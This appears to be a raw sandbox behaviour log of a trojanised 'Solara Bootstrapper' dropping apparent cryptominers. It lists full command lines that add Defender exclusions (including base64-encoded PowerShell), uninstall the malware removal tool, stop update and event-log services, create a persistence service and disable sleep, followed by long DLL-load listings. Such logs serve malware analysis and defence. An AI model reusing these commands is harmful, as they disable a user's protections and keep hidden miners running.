Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
